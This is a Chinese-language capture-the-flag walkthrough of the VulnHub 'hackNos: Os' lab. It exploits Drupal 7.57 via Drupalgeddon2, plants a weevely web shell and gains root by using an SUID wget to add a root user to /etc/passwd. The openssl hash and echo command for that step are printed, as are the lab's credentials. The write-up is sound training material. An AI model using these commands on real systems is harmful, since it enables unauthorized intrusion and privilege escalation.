Skip to content

Latest commit

 

History

History
238 lines (115 loc) · 9.14 KB

VulnHub-hackNos: Os.md

File metadata and controls

238 lines (115 loc) · 9.14 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 52 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

靶机难度:中级(CTF)-- 本人做完觉得是初级!!

靶机发布日期:2019 年 11 月 27 日

靶机描述:

Difficulty : Easy to Intermediate

Flag : 2 Flag first user And second root

Learning : exploit | Web Application | Enumeration | Privilege Escalation

Website : www.hackNos.com

mail : [email protected]

请注意:对于所有这些计算机,我已经使用 VMware 运行下载的计算机。我将使用 Kali Linux 作为解决该 CTF 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

我们在 VM 中需要确定攻击目标的 IP 地址,需要使用 nmap 获取目标 IP 地址:

我们已经找到了此次 CTF 目标计算机 IP 地址:192.168.56.143

nmap 发现开放了 22、80 端口...

80 是个 apache2... 爆破看看...

发现 drupal...

这边利用 Droopescan 进行扫描(Droopescan 是一款基于插件的扫描器,可帮助安全研究人员发现 Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用 URL 地址)和 Moodle 的问题)

这边当然也可以用 dirb,dirbuster 等等,Droopescan 比较好针对 drupal...安装连接

二、提权

方法 1:

drupal7.57 的版本...

两种方法:一种直接利用 MSF,一种利用 python 脚本...

MSF 内核直接拿到 shell...

方法 2:

git clone https://github.com/dreadlocked/Drupalgeddon2.git

先在 github 上下载该 exp... 如果执行和我一样报错,需要下载 `

gem  install highline` 因为在运行该 exp 前,需要预装依赖包 highline... 看下图

成功获得 www-data 权限,但是这里想获得 TTY 必须利用木马工具...

weevely generate cmd ./xiaoma.php

生成木马... 然后上传上去即可...

weevely http://192.168.56.143/drupal/xiaoma.php cmd

成功...

方法 3:

直接在链接下载 py,利用 python3 即可提权...

https://www.exploit-db.com/exploits/44448
python3 -c 'import pty; pty.spawn("/bin/bash")'

获得 TTY... 不演示了...

成功获得 user...

在 html 页面目录发现了 alexander.txt...

一看就知道 base64 编码,解码...

这是 brainfuck 加密后的字符串... 解码...

[解码链接](https://www.splitbrain.org/services/ook)
james:Hacker@4514

我尝试在数据库看看能不能也找到密码... 试试

发现数据库用户密码:

cuppauser、Akrn@4514

这儿也能看到,但是无法解析... 跳过

find / -perm -u=s -type f 2>/dev/null

这里可以 wget 和 sudo,但是 sudo -l 需要密码... 这里直接利用 wget 替换本地的 passwd 即可提权 root... 试试

openssl passwd -1 -salt dayu dayu
echo 'dayu:$1$dayu$/Cg/PH1Ew3w37.fLDfjX8/:0:0:root:/root:/bin/bash' >> /etc/passwd

在本地生成 root 权限用户 dayu... 开启本地服务

提权即可..

成功获得 root 权限并查看两个 flag...

当然方法很多种,千变万化,理解原理即可!!!加油!!!

由于我们已经成功得到 root 权限查看 flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号